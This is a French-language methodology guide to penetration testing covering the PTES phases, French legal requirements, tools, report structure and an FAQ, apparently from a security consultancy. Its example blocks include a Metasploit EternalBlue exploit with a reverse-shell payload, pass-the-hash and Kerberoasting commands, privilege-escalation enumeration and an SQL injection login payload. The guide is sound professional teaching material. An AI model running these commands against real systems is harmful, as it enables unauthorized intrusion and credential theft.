Le penetration testing, ou test d'intrusion, est l'une des pratiques les plus exigeantes de la cybersécurité offensive. Il consiste à simuler une cyberattaque réelle contre un système d'information dans un cadre contractuel et légal strict, afin d'identifier et de démontrer l'exploitabilité de vulnérabilités avant qu'un attaquant réel ne le fasse. En France, la demande de prestations de pentest a augmenté de 40% entre 2023 et 2025, portée par les exigences NIS 2, la multiplication des cyberattaques sur les PME et ETI, et la généralisation des programmes de conformité cyber. Pourtant, la confusion entre audit de sécurité, scan de vulnérabilités et vrai test d'intrusion reste fréquente, y compris chez des acheteurs expérimentés. Ce guide méthodologique complet couvre les 7 phases de la méthodologie PTES (Penetration Testing Execution Standard), le cadre légal français, les outils indispensables 2026, et la structure d'un rapport de pentest professionnel. Qu'il s'agisse de votre premier pentest ou d'une prestation récurrente, ce guide vous donne les clés pour commander, exécuter et valoriser un test d'intrusion efficace.

À retenir :

  • Un pentest n'est ni un scan de vulnérabilités automatisé ni un audit de sécurité : il démontre l'exploitabilité réelle des failles dans le contexte spécifique de l'organisation cible.
  • Le cadre légal impose une autorisation écrite explicite avant tout test : sans elle, le pentester engage sa responsabilité pénale sous les articles 323-1 et suivants du Code pénal.
  • La méthodologie PTES en 7 phases garantit une couverture exhaustive : de la définition du périmètre jusqu'au rapport final avec plan de remédiation priorisé.
  • La valeur d'un pentest réside dans son rapport : un rapport de qualité inclut un executive summary décisionnel, des CVSS détaillés et un plan de remédiation actionnable.
ARTICLES TECHNIQUES Penetration testing : guide PTES complet 2026 📌 Définition et types de pentest… 🔹 Cadre légal français : condition… 🔸 Méthodologie PTES : les 7… 🔺 Structure d'un rapport de… Outils indispensables 2026 Différence audit de sécurité vs… ayinedjimi-consultants.fr

Définition et types de pentest : boîte noire, grise, blanche

Un test d'intrusion est une simulation contrôlée d'attaque visant à évaluer la résilience d'un système d'information face à des menaces réelles. Il se distingue fondamentalement d'un scan de vulnérabilités automatisé (qui se contente de détecter des failles sans les exploiter) et d'un audit de sécurité organisationnel (qui évalue les processus et politiques).

Pentest boîte noire (Black Box)

Le pentester ne dispose d'aucune information préalable sur la cible : pas de documentation, pas d'identifiants, pas de schéma réseau. Il simule un attaquant externe sans privilèges. Ce mode est le plus représentatif d'une attaque réelle, mais aussi le plus coûteux car la phase de reconnaissance est longue. Il convient particulièrement aux tests de périmètre externe (exposition internet, applications web).

Pentest boîte grise (Grey Box)

Le pentester dispose d'informations partielles : un compte utilisateur standard, la liste des plages IP, parfois un accès VPN. Il simule un attaquant interne de faible privilège (employé mal intentionné, compromission d'un poste utilisateur). C'est le mode le plus équilibré rapport qualité/coût pour la majorité des organisations.

Pentest boîte blanche (White Box)

Le pentester accède aux codes sources, à la documentation d'architecture, aux identifiants administrateurs et aux schémas réseau. Il simule un attaquant avec connaissance approfondie ou un auditeur interne. Ce mode maximise la couverture des vulnérabilités identifiées mais ne reflète pas l'effort réel d'un attaquant externe. Il est particulièrement adapté aux audits de code applicatif et aux environnements très sécurisés.

Cadre légal français : conditions et autorisations obligatoires

En France, la réalisation d'un test d'intrusion sans autorisation explicite est constitutive d'une infraction pénale. Les articles 323-1 à 323-7 du Code pénal sanctionnent l'accès ou le maintien non autorisé dans un système de traitement automatisé de données (STAD) de 2 à 5 ans d'emprisonnement et 60 000 à 150 000 euros d'amende.

Documents contractuels obligatoires

Avant toute action offensive, le pentester doit disposer de : (1) une lettre d'autorisation signée par le représentant légal de l'organisation (DG, RSSI habilité), spécifiant explicitement le périmètre autorisé et les dates de la prestation ; (2) un contrat de prestation incluant les clauses de confidentialité (NDA), de limitation de responsabilité, et le tableau de contacts d'urgence ; (3) une déclaration de périmètre précisant les adresses IP, noms de domaine et applications dans le scope.

EXEMPLE - Lettre d'autorisation minimale
========================================
Je soussigne(e), [Nom], en qualite de [Fonction] de [Organisation],
autorise la societe [Prestataire] a realiser un test d'intrusion
sur les systemes suivants :
- Plages IP : 192.0.2.0/24, 198.51.100.0/24
- Applications : https://app.exemple.fr, https://api.exemple.fr

Periode autorisee : du JJ/MM/AAAA au JJ/MM/AAAA
Creneaux horaires : 8h00-20h00 jours ouvres (sauf accord special)

Tout acces hors perimetre sera immediatement arrete et signale.

Fait a [Ville], le [Date]
Signature et tampon obligatoires

RGPD et CNIL dans les pentests

Si le pentest est susceptible de toucher des systèmes contenant des données personnelles (ce qui est presque toujours le cas), le DPO de l'organisation doit en être informé. En cas de découverte de données personnelles non chiffrées lors du test, une procedére de signalement interne doit être prévue contractuellement. Le pentester ne doit pas extraire, copier ni conserver des données personnelles réelles au-delà de ce qui est nécessaire à la démonstration.

Méthodologie PTES : les 7 phases en détail

Le Penetration Testing Execution Standard (PTES) définit un cadre en 7 phases couvrant l'intégralité d'une prestation de test d'intrusion professionnelle. Il est disponible sur pentest-standard.org et constitue la référence industrie adoptée par les prestataires PASSI.

Phase 1 : Pre-engagement Interactions

Définition du périmètre, objectifs métiers, type de pentest (BB/GB/WB), règles d'engagement (heures de tests, contacts d'urgence, liste des systèmes à exclure), livrables attendus et calendrier. Cette phase aboutit à la signature des documents contractuels et à la constitution du dossier de mission.

Phase 2 : Intelligence Gathering (OSINT)

Collecte passive de renseignements sur la cible sans interagir directement avec ses systèmes. Sources : DNS (enregistrements A, MX, TXT, SPF), WHOIS, certificats SSL (crt.sh), GitHub/GitLab (fuites de code, credentials), LinkedIn (employes, technologies), Shodan (exposition internet), Google Dorks.

# Reconnaissance passive - exemples de commandes
# Subdomains via DNS
subfinder -d exemple.fr -silent | httpx -silent

# Google Dorks utiles
# site:exemple.fr filetype:pdf confidential
# site:exemple.fr inurl:admin

# Certificates transparency
curl -s "https://crt.sh/?q=%.exemple.fr&output=json" | jq -r ".[].name_value" | sort -u

# theHarvester - emails et sous-domaines
theHarvester -d exemple.fr -b all -f rapport_osint

Phase 3 : Threat Modeling

Identification des vecteurs d'attaque les plus probables basés sur le profil de la cible, les informations collectées et les objectifs du pentest. Le threat modeling guide la priorisation des efforts lors des phases suivantes.

Phase 4 : Vulnerability Analysis (Scanning)

Découverte active des hôtes, services et vulnérabilités. Cette phase est la première à générer du trafic vers les systèmes cibles.

# Nmap - scan complet avec detection de services
nmap -sV -sC -O -p- --min-rate 5000 192.0.2.0/24 -oA scan_complet

# Masscan - scan de ports ultra-rapide
masscan -p1-65535 192.0.2.0/24 --rate=10000 -oX masscan.xml

# Nuclei - detection de vulnerabilites connues
nuclei -l targets.txt -t nuclei-templates/ -severity critical,high -o vulnerabilities.txt

# Nessus/OpenVAS pour un scan de vulnerabilites complet
# (necessite une licence ou installation open source)

Phase 5 : Exploitation

Exploitation des vulnérabilités identifiées pour obtenir un accès initial. Cette phase distingue clairement le pentest d'un simple scan : le pentester exploite réellement les failles pour démontrer l'impact.

# Metasploit - exploitation structuree
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.0.2.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.0.2.100
run

# Techniques manuelles - elevation de privileges Linux
# Recherche de binaires SUID
find / -perm -4000 -type f 2>/dev/null
# Cron jobs writables
crontab -l; ls -la /etc/cron*
# Services root vulnerables
ps aux | grep root

Phase 6 : Post-Exploitation et mouvement latéral

Après accès initial, le pentester évalue l'étendue de la compromission possible : escalade de privilèges, persistance, pivotement vers d'autres systèmes, accès à des données sensibles. Dans un pentest professionnel, cette phase s'arrête à la démonstration de l'impact sans extraction massive de données.

# Mouvement lateral Windows avec Impacket
# Pass-the-Hash
impacket-psexec -hashes :NTLMhash [email protected]

# Reconnaissance AD post-compromission
impacket-GetADUsers -all corp.local/user:password
impacket-GetUserSPNs corp.local/user:password -request  # Kerberoasting

# CrackMapExec - lateral movement et enumeration
crackmapexec smb 192.0.2.0/24 -u admin -H NTLMhash --shares

Pour une couverture approfondie des techniques d'évasion EDR lors de la post-exploitation, consulter notre article sur le bypass EDR. La boîte à outils complète est détaillée dans notre guide outils pentest 2026.

Phase 7 : Reporting

La phase de reporting est souvent sous-estimée mais c'est elle qui délivre la valeur finale de la prestation. Un rapport de pentest professionnel comprend deux parties distinctes : un executive summary destiné aux dirigeants (1-2 pages, sans jargon technique, axe sur les risques métiers) et un rapport technique destiné aux équipes IT/Sécurité (détails des vulnérabilités, étapes de reproduction, remédiation).

Structure d'un rapport de pentest professionnel

La qualité d'un rapport de pentest est un critère clé de sélection d'un prestataire. Un bon rapport n'est pas un simple dump de screenshots Burp Suite : il raconte l'histoire de la compromission, quantifie l'impact, et fournit un plan de remédiation concret et priorisé.

Scoring CVSS et priorisation

Chaque vulnérabilité identifiée est évaluée avec le score CVSS v3.1 (Common Vulnerability Scoring System). Le score CVSS combine métriques de base (vecteur d'attaque, complexité, impact CIA), temporelles (disponibilité d'exploit) et environnementales (contexte spécifique). Dans un rapport de pentest, la critéreté est généralement exprimée en 5 niveaux : Critique (≥9.0), Haute (7.0-8.9), Moyenne (4.0-6.9), Basse (0.1-3.9), Informative.

MODELE DE FICHE VULNERABILITE
================================
ID: VULN-2026-001
Titre: Injection SQL sur le formulaire de connexion
CVSS 3.1: 9.8 (Critique) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description:
Une injection SQL non authentifiee a ete identifiee sur le parametre
'username' du formulaire /login. Elle permet l'extraction de la
totalite de la base de donnees utilisateurs.

Preuve (PoC):
Payload: admin' OR '1'='1'--
Resultat: Connexion reussie avec le compte administrateur

Impact: Compromission totale des donnees utilisateurs (500 000 comptes)
Remediation: Utiliser des requetes preparees (PreparedStatement)
Priorite: P0 - Correction sous 48h
References: CWE-89, OWASP A03:2021

Outils indispensables 2026

L'écosystème des outils de pentest évolue rapidement. Voici les outils incontournables pour une prestation professionnelle en 2026, classés par phase d'utilisation. Notre guide complet des outils pentest 2026 détaille la configuration et l'usage avancé de chacun.

Kali Linux et distribution de base

Kali Linux 2026 reste la distribution de référence pour le pentest. Elle intègre plus de 600 outils de sécurité, avec une mise à jour continue. En 2026, Kali propose des profils métier (pentest web, AD, cloud, IoT) qui préchargent les outils pertinents. Alternative crédible : ParrotOS pour les environnements contraints en ressources.

Burp Suite Pro pour les tests applicatifs

Burp Suite Professional est l'outil de référence pour les tests d'applications web. Ses fonctionnalités clés en 2026 : proxy d'interception, scanner automatisé (Active Scan ++), Intruder pour les attaques par force brute et fuzzing, Collaborator pour la détection des vulnérabilités hors-bande (SSRF, XXE). Le guide OWASP Web Security Testing Guide est la référence complémentaire.

Impacket et CrackMapExec pour l'AD

Pour les pentests de réseau interne et Active Directory, Impacket (Python) et CrackMapExec (maintenant netexec) sont incontournables. Ils implémentent les protocoles Windows (SMB, LDAP, Kerberos, DCE/RPC) et permettent d'effectuer Pass-the-Hash, Kerberoasting, AS-REP Roasting, DCSync sans avoir besoin d'accès physique à un poste Windows. Consulter également notre article sur le pentest interne 2026.

Différence audit de sécurité vs pentest vs bug bounty

Ces trois types de prestations sont souvent confondus mais ont des objectifs, méthodologies et livrables distincts. L'audit de sécurité évalue la conformité à un référentiel (ISO 27001, ANSSI, NIS 2) via des interviews et revues documentaires : il dit ce qui est conforme ou non, pas si c'est exploitable. Le pentest démontre l'exploitabilité réelle des failles dans le contexte spécifique de l'organisation. Le bug bounty externalise la découverte continue des vulnérabilités à une communauté de chercheurs rémunérés à la découverte. Pour les résultats complets des tests d'intrusion et leur valorisation, notre guide rapport de pentest entreprise 2026 est essentiel.

FAQ — Questions fréquentes sur le penetration testing

Quelle est la différence entre un audit et un pentest ?

Un audit de sécurité évalue la conformité : il vérifie si les politiques, procédures et configurations respectent un référentiel donné (ISO 27001, ANSSI, PCI-DSS). Il aboutit à une liste d'écarts avec des recommandations. Un pentest démontre l'exploitabilité : le testeur essaie activement de compromettre les systèmes et prouve qu'une faille peut être exploitée pour obtenir un accès non autorisé ou exfiltrer des données. Les deux sont complémentaires : l'audit identifie les écarts de conformité, le pentest identifie les risques réels. Une organisation mature réalise les deux régulièrement.

Combien de temps dure un pentest et quel est le coût moyen en France ?

La durée d'un pentest dépend du périmètre et du type : une application web (boîte grise) prend 3-5 jours, un pentest interne réseau et AD 5-10 jours, un pentest de périmètre externe 2-4 jours. Un test Red Team complet peut durer 2 à 4 semaines. Coté tarifs 2026 en France, comptez : pentest web app 3K-8K euros, pentest interne 5K-15K euros, Red Team complet 20K-60K euros. Les prestataires certifiés PASSI pratiquent souvent des tarifs 20-30% supérieurs mais offrent une couverture d'assurance supplémentaire et une méthodologie auditée par l'ANSSI.

Faut-il être certifié PASSI pour réaliser un pentest en France ?

La qualification PASSI (Prestataires d'Audit de la Sécurité des Systèmes d'Information) de l'ANSSI n'est obligatoire que pour les audits des OIV (Opérateurs d'Importance Vitale) et des OSE (Opérateurs de Services Essentiels) dans leurs systèmes soumis à réglementation sectorielle. Pour les autres organisations, la qualification PASSI est un critère de sélection fortement recommandé (garantie de compétences, méthodologie documentée, couverture assurance) mais pas une obligation légale. En présence d'une exigence contractuelle client (grands groupes, secteur financier), la qualification CREST ou OSCP du prestataire peut être acceptable en alternative.

Que faire après la réception du rapport de pentest ?

La réception du rapport de pentest déclenche un processus de remédiation structuré : (1) Présentation à la direction (executive summary), (2) Triage des vulnérabilités critiques avec le RSSI (patch immédiat des failles critiques sous 48-72h), (3) Planification des corrections moyennes et basses dans le backlog sécurité, (4) Validation des corrections par le prestataire (retest), (5) Intégration des leçons apprises dans le programme de sécurité (formation, processus, architecture). Un rapport sans plan de remédiation suivi est un coût sans ROI.